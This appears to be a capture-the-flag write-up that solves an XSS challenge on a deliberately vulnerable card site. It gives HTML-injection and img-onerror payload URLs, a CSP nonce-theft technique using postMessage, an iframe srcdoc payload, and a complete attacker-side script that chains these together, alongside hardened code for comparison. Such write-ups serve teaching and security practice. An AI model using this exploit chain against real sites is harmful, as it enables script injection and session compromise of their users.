XSS challenge — The XSS rat & BugPoc

Let’s play a game… or maybe just pop an XSS?

Let’s start by checking out the challenge page:

Notice that the card's details are somehow sent back:

Checking the source code

The ‘Pop up’ page uses the script script.js to take care of all its functionality. At the bottom of the script we can see the following:

HTML injection

Let’s try to build a URL fragment that makes JSON.parse fail, so that execution reaches the catch block, and that also carries an HTML payload. The fragment `==<h1>hihi` should do the job. The first URL below confirms plain HTML injection; the second swaps the harmless heading for a tag that should execute JavaScript:

https://cards.buggywebsite.com/popup.html#==<h1>hihi
https://cards.buggywebsite.com/popup.html#==<img src=x onerror=alert(1)>
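To make the sink concrete, here is an added example (not the challenge's own script.js) of the fragment-handling pattern this section relies on: a JSON.parse failure drops into a catch block that renders the raw fragment as HTML. The exact way popup.html parses its fragment is an assumption; the vulnerable version sits next to a hardened one that treats the error-path input as text.

```javascript
// Added example: a minimal model of the fragment-handling pattern this
// section describes. It is not the challenge's script.js; the exact way
// popup.html parses its fragment is an assumption here. What is kept is
// the behaviour the write-up relies on: JSON.parse fails, execution
// reaches the catch block, and the raw fragment ends up rendered as HTML.

function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) =>
    ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]));
}

function stripHash(fragment) {
  return fragment.startsWith('#') ? fragment.slice(1) : fragment;
}

function cardHtml(card) {
  // Happy path: the card fields are escaped, so this branch is not the problem.
  return `<p>${escapeHtml(card.name)}: ${escapeHtml(card.msg)}</p>`;
}

// Vulnerable sink: the error path interpolates the untrusted fragment
// straight into markup. With innerHTML as the destination, '#==<h1>hihi'
// becomes a live <h1>.
function renderFragmentVulnerable(fragment) {
  const raw = stripHash(fragment);
  try {
    return cardHtml(JSON.parse(decodeURIComponent(raw)));
  } catch (e) {
    return `<p class="error">Could not load card: ${raw}</p>`;
  }
}

// Hardened sink: same logic, but the error path treats the input as text.
function renderFragmentHardened(fragment) {
  const raw = stripHash(fragment);
  try {
    return cardHtml(JSON.parse(decodeURIComponent(raw)));
  } catch (e) {
    return `<p class="error">Could not load card: ${escapeHtml(raw)}</p>`;
  }
}

// In the page itself the result would be assigned to an element's innerHTML:
//   document.getElementById('card').innerHTML = renderFragmentVulnerable(location.hash);
```

Note that a `decodeURIComponent` failure (a bad percent sequence) also lands in the catch block, so the error path is reachable with more than just non-JSON input; that is why the hardened version escapes rather than trying to filter.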

XSS? No, CSP

Oh. CSP strikes again. Let’s use Google’s CSP evaluator to test this website’s CSP policy:

More source code

Let’s move along and check the loadPage function.

```js
indexes = ["a","b","c"];
result = indexIntoMultidimentionalArray(array, indexes);
// result will be:
// result = array["a"]["b"]["c"];
```
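As an added example (illustrative code, not the challenge's script.js), here is an implementation that does exactly what the comment above describes, alongside the check a reviewer would want when the index list is attacker controlled: a naive key-by-key walk happily follows inherited properties such as `constructor`, so it can reach values that are not in the data at all. The function name keeps the page's spelling; the sample data is constructed.

```javascript
// Added example: a direct implementation of the behaviour described by the
// comment (result = array["a"]["b"]["c"]), plus a hardened variant. Not the
// challenge's own code; the sample data below is constructed.

// Walks obj one key at a time. Each step is a plain property access, so any
// key that exists anywhere on the prototype chain is followed.
function indexIntoMultidimentionalArray(obj, indexes) {
  return indexes.reduce((acc, key) => acc[key], obj);
}

// Same walk, but every step must be an own property of an object or array,
// which keeps the caller inside the data structure.
function indexIntoMultidimentionalArraySafe(obj, indexes) {
  let cur = obj;
  for (const key of indexes) {
    if (cur === null || typeof cur !== 'object' ||
        !Object.prototype.hasOwnProperty.call(cur, key)) {
      return undefined;
    }
    cur = cur[key];
  }
  return cur;
}

// Constructed sample data.
const cards = { a: { b: { c: 'birthday' } } };

// Intended use: both walks reach the same leaf.
function intendedLookup() {
  return {
    naive: indexIntoMultidimentionalArray(cards, ['a', 'b', 'c']),
    safe: indexIntoMultidimentionalArraySafe(cards, ['a', 'b', 'c']),
  };
}

// Unintended use: none of 'constructor' or 'name' is in cards, yet the naive
// walk returns 'Object' because every plain object inherits Object.prototype.
function prototypeWalkDemo() {
  return {
    naive: indexIntoMultidimentionalArray(cards, ['a', 'constructor', 'name']),
    safe: indexIntoMultidimentionalArraySafe(cards, ['a', 'constructor', 'name']),
  };
}
```

The naive version also throws a TypeError as soon as a step yields `undefined` and another key follows, so in the real page any unexpected index list is either an exception or a walk outside the intended object.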

Time to exploit

Now that we understand what’s going on, it’s time to exploit! We already know that we should be able to receive the message sent with postMessage on our own attacker-controlled site, since the targetOrigin is set to ‘*’ (the browser then delivers it no matter which origin is loaded in the receiving window), but let’s test it in practice:

Note: you need to allow the pop-up.
  1. Dynamically create an XSS payload containing the extracted nonce
  2. Send the XSS payload in a URL fragment that makes JSON.parse fail and pops the sacred alert box

Iframes to the rescue

To get around this we can simply use the iframe tag and its beautiful attribute: srcdoc. This attribute lets us specify the HTML to embed in a brand-new browsing context created by the iframe. A payload like the following will do the job: `<iframe srcdoc="<script nonce=EXTRACTED_VAL>alert(origin);</script>">`. The reason it works is that the srcdoc content is parsed as a fresh document, so its inline script actually executes (a `<script>` inserted through innerHTML never runs), while the srcdoc document inherits the parent page’s CSP, which is why the nonce is still required.
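The two steps listed under “Time to exploit” and the srcdoc payload above, tied together as an added example. This is illustrative attacker-side glue, not the author’s PoC. Assumptions: the popup posts either a string or an object with an `html` field in which the page’s script nonce appears as `nonce="..."` or `nonce=...`; the real message shape is not shown on this page. The URL is the challenge’s popup.html.

```javascript
// Added example: attacker-side page for the chain described in the write-up.
// Not the author's PoC. Assumed: the message received from the popup carries
// the page's markup (as a string, or in an `html` field) with the nonce in it.

const POPUP_URL = 'https://cards.buggywebsite.com/popup.html';

// Pull the nonce out of whatever the popup sent us.
function extractNonce(message) {
  const text = typeof message === 'string' ? message : (message && message.html) || '';
  const m = /nonce=["']?([A-Za-z0-9+\/=_-]+)/.exec(text);
  return m ? m[1] : null;
}

// Build the fragment. The leading '==' is the write-up's trick to make
// JSON.parse throw so the page takes its catch path. The iframe's srcdoc is
// parsed as a fresh document, so its inline script runs, and the nonce
// satisfies the CSP that the srcdoc document inherits from popup.html.
function buildFragment(nonce) {
  if (!/^[A-Za-z0-9+\/=_-]+$/.test(nonce)) throw new Error('unexpected nonce format');
  return `==<iframe srcdoc="<script nonce=${nonce}>alert(origin)</script>">`;
}

function buildPopupUrl(nonce, base = POPUP_URL) {
  return base + '#' + buildFragment(nonce);
}

// Browser glue; skipped when run under Node for the assertions below.
// The pop-up blocker must allow the window, as the write-up notes.
if (typeof window !== 'undefined') {
  window.open(POPUP_URL); // step 0: get the popup to post its message to us
  window.addEventListener('message', (ev) => {
    // targetOrigin '*' on the sender side is why this arrives at our origin.
    const nonce = extractNonce(ev.data);
    if (!nonce) return;
    // A fresh window is opened on purpose: changing only the fragment of an
    // already-loaded page does not reload it, so the payload might never be parsed.
    window.open(buildPopupUrl(nonce));
  });
}
```

The nonce format check in `buildFragment` is not cosmetic: the nonce is interpolated into an attribute value that is itself inside a double-quoted srcdoc attribute, so an unexpected character (a `"` in particular) would break the payload rather than the target.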
